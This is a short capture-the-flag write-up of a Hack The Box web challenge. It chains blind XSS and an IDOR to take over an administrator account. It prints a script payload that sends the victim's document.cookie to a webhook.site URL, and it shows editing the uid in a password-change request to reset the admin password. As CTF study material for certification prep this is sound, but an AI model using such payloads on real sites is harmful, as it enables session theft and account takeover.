Kryptos SupportPlatform: Hack The Box (Challenge)
Difficulty: Medium
Kryptos Support is a web challenge that involves chaining a Blind XSS vulnerability to hijack a moderator session and then abusing an Insecure Direct Object Reference (IDOR) to reset the administrator password. It’s highly relevant to CBBH prep, as it practices cookie exfiltration and API parameter tampering.
/ with a simple ticket submission form/loginSubmitted the following payload in the message field:
<script>
new Image().src="http://webhook.site/abc123?c="+document.cookie;
</script>
Set stolen cookie in browser → Visited /admin → Gained access to /tickets
Visited /settings, and intercepted the following request during password change:
{
"uid": 10,
"newpassword": "hackedpass"
}
Modified uid to 1:
{
"uid": 1,
"newpassword": "hackedpass"
}
admin with new passwordHTB{p0pp1ng_x55_4nd_id0********}